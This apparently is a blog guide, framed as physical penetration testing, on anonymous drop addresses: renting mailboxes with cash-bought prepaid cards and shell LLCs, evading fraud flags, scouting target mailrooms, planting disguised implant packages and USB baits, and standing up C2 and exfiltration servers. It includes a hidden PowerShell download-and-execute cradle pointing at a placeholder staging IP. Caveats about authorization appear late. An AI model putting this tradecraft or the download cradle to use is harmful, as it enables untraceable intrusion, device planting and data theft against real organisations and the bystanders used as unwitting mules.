How To Find Drop Addresses / Locations
- Biohazard

- Jul 23
- 11 min read

Finding Drop Addresses / Locations
In physical penetration testing, a "drop address" is a location where you receive or stage equipment without linking it back to your real identity or the testing firm. This could be receiving Hak5 implants shipped by a vendor, accepting a package at a location the target won't scrutinize, or staging equipment near a target site for a physical breach. The goal is to break the chain of attribution between the equipment, the tester, and the engagement. I'll cover the full spectrum — physical mail drops, digital staging infrastructure, and on-site delivery point reconnaissance.
Physical Mail Drops - Receiving Equipment Anonymously
These are locations where you can receive packages without exposing your firm's real address, your name, or your payment trail.
Commercial Mail Receiving Agencies (CMRAs)
Think UPS Store, private mailbox rental shops, and coworking spaces with mail handling. You rent a box, they receive packages, you pick them up.
What works:
UPS Store mailbox — gives you a real street address (not a PO Box), accepts packages from all carriers (USPS, UPS, FedEx, DHL). Key detail: the address format is 123 Main St #456 not PO Box 456. Packages look residential/commercial. Minimum rental is typically 3 months. Requires government ID to open, but the ID goes to the store owner, not onto the package.
Private mailbox shops (independent, non-chain) — often looser about ID requirements, may accept cash, may not log everything digitally. Research local shops in industrial/commercial zones — they're used to receiving weird packages.
Virtual office services (Regus, WeWork, etc.) — more expensive but more legitimate-looking. You get a real office address, sometimes with a receptionist who signs for packages.
What doesn't work:
USPS PO Boxes — only accept USPS packages. UPS, FedEx, DHL packages get rejected. Useless for receiving hardware shipments from most vendors.
Residential addresses in your name — defeats the purpose.
Hotel addresses — hit-or-miss, most hotels won't accept packages for non-guests, and the timing is unpredictable.
OPSEC for mail drops:
Use a different CMRA for vendor shipments vs. your firm's address. If Hak5 ships to your real office and the target later investigates (unlikely but possible), a subpoena to Hak5 reveals your firm name. Ship to a CMRA.
Pay for the CMRA with a prepaid card or business card not directly tied to the pentest firm. Some firms use a separate LLC shell with a generic name.
Don't forward mail from the CMRA to your real address. Pick it up in person. Forwarding creates a paper trail.
Wait 2-4 weeks after renting before receiving sensitive packages. Many CMRA operators flag accounts that start receiving packages immediately after opening — it matches fraud patterns.
Use different CMRA addresses for different engagements. One address, one client. If an engagement goes sideways and law enforcement gets involved, cross-contamination between clients is a liability.
Abandoned / Vacant Properties
Using vacant properties as drop points is common in red team operations but carries significant legal risk even in authorized tests. You'd need explicit written permission in the scope document. Most firms avoid this entirely and stick to CMRA solutions because the legal exposure (trespassing, suspicious activity reports from neighbors) outweighs the OPSEC benefit.
Rented Short-Term Addresses (Airbnb Approach)
Some red teams rent houses or apartments short-term specifically to use as staging points near a target. This is expensive but provides:
A physical base of operations near the target
Package receiving capability
A place to stage equipment, change clothes, debrief
A legitimate residential address that passes scrutiny
The lease and utilities create a paper trail, but if the rental is under a shell company and paid with a prepaid card, the trail dead-ends.
Identifying Target Facility Drop Points - On-Site Reconnaissance
During a physical pentest, you need to identify where a real attacker would stage equipment or receive packages at or near the target facility. This is part of your physical security assessment.
External Recon — Before You Arrive
Google Maps / Street View:
Identify all building entrances. Front door, side doors, loading dock, employee entrances, emergency exits.
Look for mailrooms with external access. Some buildings have a separate mailroom door or a package drop box.
Identify nearby businesses where a package could be misdelivered. A coffee shop next door, a shared office building lobby, a neighboring retail store.
Find parking lots with direct line of sight to the target but outside camera coverage.
Street View time analysis:
Check when the Street View imagery was captured. If it's more than 6 months old, expect changes.
Look for: security cameras, intercom systems, package lockers, mail slots, reception desk visibility from outside, signage indicating mail/delivery procedures.
Google Maps / Apple Maps:
Search for "mailbox near [target address]" — find public USPS collection boxes where an attacker could drop a package for a courier to pick up (if the attacker is the sender rather than receiver).
Search for "UPS Store near [target address]" — the nearest CMRA to the target. If it's very close, an attacker might use it for staging.
Identify all businesses within a 1-block radius. Any of them could be a misdelivery target.
County property records:
Pull the target's property record. Who owns the building? Is it leased or owned? Who are the neighboring property owners? Adjacent properties with shared walls or shared lobbies are the most vulnerable.
Check for recent sales or vacancies nearby. Vacant adjacent units are ideal staging points.
Delivery service maps:
UPS, FedEx, and Amazon all have public maps of access points and lockers. Find the nearest ones to the target. These are places where an attacker could send a package for pickup, or where a misdirected package might end up.
On-Site Recon — What to Observe
When you arrive on site (before the physical breach attempt):
Package handling procedures:
Where does the mail carrier park? Where do UPS/FedEx trucks stop?
Is there a loading dock? Is it staffed? Does the dock door stay open?
Are packages left at a reception desk? Left outside? Placed in a package locker?
What time do deliveries typically arrive? Morning (8-10am) is standard for UPS/FedEx. USPS varies by route.
Does the receptionist sign for packages or just accept them? Do they check ID?
Access control for deliveries:
Is the mailroom accessible without a badge? Many buildings have mailrooms in the lobby — before the access-controlled area. An attacker can walk in, drop a package on the mailroom table, and walk out.
Is there a package drop box accessible from outside? Some buildings have a slot or locker system facing the street.
Are there any unattended delivery points? Loading docks that are open during business hours. Fire exits that are propped open. Service entrances used by cleaning staff.
Social engineering opportunities:
Observe the front desk staff. Are they busy? Distracted? On their phone? Friendly or suspicious?
Does anyone challenge you when you walk in? Or can you walk through the lobby unchallenged?
Are there delivery uniforms? (UPS brown, FedEx purple/orange, DHL yellow, Amazon blue). Which carriers do you see? Could someone in a fake uniform blend in?
Is there a coffee shop or deli in the building lobby? External visitors use it — you can sit and observe for hours.
Identifying the Optimal Drop Point
Score potential drop points on these factors:
Factor | Good | Bad |
Accessibility to attacker | Publicly accessible, no badge required, no cameras | Behind access control, guarded, heavily monitored |
Proximity to target | Same building, same floor, shared lobby | Different block, requires vehicle |
Likelihood target accepts the item | Looks like a normal delivery, matches expected carriers | Suspicious packaging, unknown courier, no label |
Camera coverage | No cameras or blind spots | Covered by multiple cameras with monitoring |
Staff interaction | Unattended drop point, busy staff, no signature required | Vigilant receptionist who checks every package |
Anonymity for attacker | High foot traffic, attacker blends in | Empty hallway, attacker is the only person there |
Legal exposure | Public space, no trespassing | Private property, requires permission |
Digital Drop Addresses - Staging Servers And C2 Infrastructure
In the context of a broader pentest (especially one involving Hak5 implants), you also need "drop addresses" for digital payloads — servers where implants phone home, where exfiltrated data lands, and where you stage payloads.
C2 Server Hosting
Your C2 server is a digital drop address. Requirements:
Option | Pros | Cons |
Cloud VPS (DigitalOcean, Linode, AWS, Azure) | Fast provisioning, scalable, disposable (destroy after engagement) | CSPs log everything, may receive abuse reports, subpoena-friendly |
Bulletproof hosting | Ignores abuse reports, privacy-focused jurisdictions (Netherlands, Russia, Seychelles) | Expensive, unpredictable uptime, some are honeypots |
Compromised infrastructure | Free, no paper trail to you | Illegal — you cannot compromise third-party infrastructure even in an authorized pentest unless they're in scope |
Physical server (your office, rented colo) | Full control, no CSP logging | Slow to provision, physical trail, fixed location |
Onion service (.onion) | Anonymous, no IP to trace, no hosting provider | Tor latency, requires target to have Tor (rare for implants), less reliable |
Best practice for authorized pentests: Provision a cloud VPS under the engagement's scope, document the IP in the rules of engagement, and destroy it after the engagement. Use the client's name on the account (or your firm's) — this is authorized testing, not a covert operation against an adversary. You want the paper trail showing this was a controlled test.
Payload Staging Server
The server hosting your DuckyScript stagers (stage.ps1, stage.sh):
; DuckyScript download cradle points here:
STRING powershell -W Hidden (iwr http://YOUR_STAGING_IP/stage.ps1|iex)Requirements:
HTTP server (Python http.server, Apache, Nginx)
HTTPS preferred — many corporate environments block cleartext HTTP downloads, and Defender is less likely to flag HTTPS traffic
Quick to provision: python3 -m http.server 80 works in a pinch
Consider Let's Encrypt for a valid TLS cert — implants connecting to self-signed certs may trigger alerts
Data Exfiltration Endpoint
Where exfiltrated data lands. Could be the same as the C2 server or a separate endpoint:
HTTP POST endpoint: Simple Python Flask or PHP script that receives and saves data
DNS exfiltration: A DNS server you control that logs queries — data is encoded in subdomains
Cloud storage: S3 bucket, Azure Blob — but CSP logging applies
Email: Data exfilled via SMTP to a drop email address (disposable email service or dedicated engagement mailbox)
Drop Email Addresses
For phishing campaigns that run alongside the physical pentest:
Disposable email services: Guerrilla Mail, 10MinuteMail — temporary, no signup, but many are blocked by corporate filters
Custom domain email: Register a domain similar to the target's (typosquatting) with an MX record. targetcorp-support.com looks legitimate. Set up a catch-all mailbox.
ProtonMail / Tutanota: Encrypted, privacy-focused. ProtonMail requires phone verification for new accounts (can be bypassed with a burner number for $2).
Gmail / Outlook with burner info: Simple but Google/Microsoft log creation IPs and phone numbers. Acceptable for low-sensitivity tests.
Practical Drop Address Scenarios In A Physical Pentest
Scenario A: Receiving Hak5 Implants for the Engagement
You need to receive O.MG Cables, Key Crocs, WiFi Pineapples, etc., without linking them to your firm before deployment.
Rent a UPS Store mailbox in a neighboring city (not your own, not the target's city). Pay with a prepaid Visa purchased with cash.
Order equipment from Hak5 or an authorized reseller, shipped to the UPS Store address.
Pick up in person. Drive to the pickup in a personal vehicle or rental. Don't use a company car with decals.
Transport equipment to the staging location (hotel, rented house, or directly to the engagement site).
After engagement, close the mailbox. If you prepaid 3 months, just let it expire. Don't forward mail.
Scenario B: Dropping a Device at the Target Facility
You need to place a Packet Squirrel or WiFi Pineapple at the target site and you can't carry it through the front door in your pocket.
Recon the mailroom. Is it in the lobby, pre-access-control? Can you walk in and leave a package?
Package the device in a box that looks like a normal delivery. Amazon box with a printed label. UPS envelope. Inter-office mail envelope (if you know the format they use).
Label it to a real employee (found via LinkedIn). "ATTN: John Smith, IT Department." If the receptionist calls John and he says "I didn't order anything" — that's a problem. Better: label it generically: "IT Department — Equipment Return" or "Facilities — Maintenance Parts."
Walk in dressed normally. Not a hoodie and sunglasses. Business casual. Act like you belong.
Drop the package on the mailroom table, reception desk, or wherever you observed packages being left.
Walk out. Don't look back. Don't run.
Variation: Misdelivery to adjacent business. "Sorry, I think this was accidentally delivered to us. It's addressed to your building." Hand it to the receptionist. They'll route it to the target's mailroom. The receptionist at the adjacent business is now an unwitting mule.
Scenario C: USB Drop in the Parking Lot / Common Area
The classic USB drop — leave a Rubber Ducky in the parking lot, smoking area, or break room. Not a "drop address" in the traditional sense, but a physical drop point:
Brand the USB drive with something intriguing. "Payroll Q4," "Termination List," "Confidential — HR." Or leave it completely blank — curiosity works.
Choose a location where employees congregate but cameras are sparse. Smoking area. Parking lot near employee entrance. Break room. Bathroom.
Drop it casually. Walk by, let it fall out of your pocket. Don't bend down to place it — that's visible on cameras.
The target picks it up and plugs it in. The Rubber Ducky fires. You have a shell.
Legality And ROE Considerations
This is the critical section. Drop addresses for physical pentesting are legal minefields. Your authorization must be explicit.
What the ROE Must Include
Your Rules of Engagement document must explicitly authorize:
Physical access attempts — breaking into the building? Tailgating? Dropping devices? All must be enumerated.
Social engineering — impersonating delivery personnel, misrepresenting yourself to staff.
Device placement — leaving hardware on premises, in mailrooms, in parking lots.
Third-party interactions — interacting with neighboring businesses, using them as unwitting mules.
Safe-word / halt procedures — what happens if you're caught? Who do they call? What do you say?
Geographic boundaries — addresses in scope, adjacent properties out of scope.
What You Cannot Do (Even With Authorization)
Open a mailbox under a false identity. Using a fake ID to open a UPS Store mailbox is identity fraud, a crime in every state. You can use a real ID — yours or a firm principal's. The mailbox itself is legal; the fraud is in the ID.
Use a real person's name without consent on a package. If you label a package "ATTN: Jane Smith" and Jane Smith is a real employee who didn't consent, you're potentially committing fraud or impersonation. Use generic labels when possible, or get explicit consent for named targets in the ROE.
Intercept actual USPS mail. Tampering with USPS mail is a federal felony. Don't touch anything that's actual mail in transit. Leaving a package on a table in the mailroom is not intercepting mail — it's abandoning property. Know the distinction.
Enter areas you're not authorized to enter. Even if the ROE says "attempt physical access," breaking and entering is still a crime. ROE from the client doesn't override criminal law — it provides an affirmative defense. You can still be arrested. The ROE is what your lawyer shows the prosecutor to get charges dropped, not what prevents the handcuffs.
If You Get Caught
Stop immediately. Don't run, don't argue, don't resist.
Identify yourself. "I'm a security consultant. Here's my card. I'm conducting authorized testing for [Client Name]. Please call [ROE Contact Name] at [Phone Number]."
Have the authorization letter on you. A printed, signed letter from the client's CISO or COO on company letterhead, with a phone number for verification. Not on your phone — a physical letter. If you're detained, your phone will be taken.
Shut up after that. Don't explain what you were doing, how you got in, or what devices you placed. "I'm invoking my right to remain silent and I'd like to speak with an attorney." The client's legal team will sort it out.
Quick Reference: Drop Address Workflow
Phase 1: Planning
└── ROE signed, scope defined, safe-word established
└── Equipment list finalized (what needs to be shipped/received)
Phase 2: Mail Drop Setup (if receiving equipment anonymously)
└── Rent CMRA mailbox (UPS Store, private mail shop)
└── Pay with prepaid card
└── Wait 2-4 weeks before receiving packages
└── Order equipment → ship to CMRA address
Phase 3: Target Recon
└── Google Maps / Street View — identify entrances, cameras, mailrooms
└── On-site observation — delivery patterns, staff behavior, access control
└── Map potential drop points (mailroom, lobby, loading dock, adjacent businesses)
└── Score each point; select primary and backup
Phase 4: Digital Infrastructure
└── Provision C2 server (cloud VPS, documented in ROE)
└── Set up staging server for payload downloads
└── Configure exfiltration endpoint
└── Test all paths from a lab machine before deployment
Phase 5: Execution
└── Assemble implant packages (look like normal deliveries)
└── Deploy to selected drop points
└── Monitor C2 for callbacks
└── Exfil data, retrieve devices (or abandon/self-destruct)
Phase 6: Cleanup
└── Retrieve or remotely destroy all placed devices
└── Destroy C2 server and staging infrastructure
└── Close CMRA mailbox or let it expire
└── Document everything for the final report







Comments